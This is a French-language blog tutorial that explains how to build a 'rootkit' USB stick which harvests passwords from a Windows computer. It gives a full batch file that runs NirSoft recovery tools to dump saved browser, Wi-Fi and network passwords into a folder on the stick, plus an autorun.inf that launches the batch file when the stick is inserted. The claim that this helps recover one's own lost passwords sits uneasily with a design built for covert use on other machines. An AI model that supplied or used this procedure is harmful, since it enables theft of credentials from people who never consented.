TUTO HACK: Création d’une clé USB rootkit

Dernière mise à jour : 7 mai 2022

Aujourd'hui, nous allons voir comment créer une clé USB qui récupère les mots de passe d’un ordinateur. Cette clé USB s’exécute automatiquement et récupère la plupart des mots de passe stocker sur un ordinateur.

Il est vraiment très utile surtout quand on a perdu ses mots de passe.

Pour créer une clé USB rootkit, suivez les étapes ci-dessous:

Étape 1

Nous allons dans un premier temps télécharger quelque outils qui nous permettent de récupérer les mots de passe des applications les plus courantes. Toutes ces applications sont issues du site Nirsoft (http://www.nirsoft.net/).

Ensuite, nous allons placer tous les fichiers .exe  sur notre clé USB.

usb1

Étape 2

Maintenant, il faut créer un fichier launch.bat qui va ouvrir automatiquement les programmes de récupération de mot de passe et il va  stocker les résultats dans un fichier texte.
Pour cela, on doit créer un nouveau document texte avec bloc note ou autre et écrire le code ci-dessous.

@echo off
start WebBrowserPassView.exe /stext dossier1/WebBrowserPassView.txt
start WirelessKeyView.exe /stext dossier1/WirelessKeyView.txt
start netpass.exe /stext dossier1/netpass.txt

Attention a bien vérifier que les noms des outils correspondent bien aux noms qui sont écrit dans le fichier launch.bat .
A cette étape, lorsque launch.bat sera exécuté, ces logs seront envoyé dans un dossier appelé dossier1. Il  faut donc créer un nouveau dossier et le nommer dossier1.

Étape 3

Ensuite, nous allons créer le fichier autorun.inf. Le fichier autorun.inf est un fichier texte enregistré à la racine d'un périphérique de stockage (DVD, Clé USB, etc.) permettant d'automatiser le lancement de certains programmes lors de l'insertion d'un périphérique de stockage.
Lorsque vous insérez votre clé USB généralement une fenêtre apparaît en nous demandant ce que l’on désire faire !
Dans cette fenêtre, nous allons créé une nouvelle option qui nous permettra ( une fois qu'on a cliqué dessus ) de récupérer les mots de passes de l'ordinateur et de les stockés dans le dossier créé dans l’étape 2.
Pour réaliser ceci, ouvrez un nouveau document texte puis insérez le code suivant :

[autorun]
open=launch.bat
ACTION='Le nom de la nouvelle option'

Enfin, enregistrez le fichier autorun.inf.

Félicitation ! Votre clé USB rootkit est maintenant près à utiliser, il ne vous reste plus qu'à la tester.

Remarque: l'AutoRun n'est plus disponible sur Windows 7 et Windows 10. Avec la progression des virus exploitant la fonction AutoRun pour s’installer, Microsoft a décidé de le retirer de Windows 7 et 10 lors de la connexion d’un support USB à un PC.
Donc pour récupérer les mots de passe d'un ordinateur sous Windows 7 ou Windows 10, il faut cliquer manuellement sur le petit programme Launch.bat.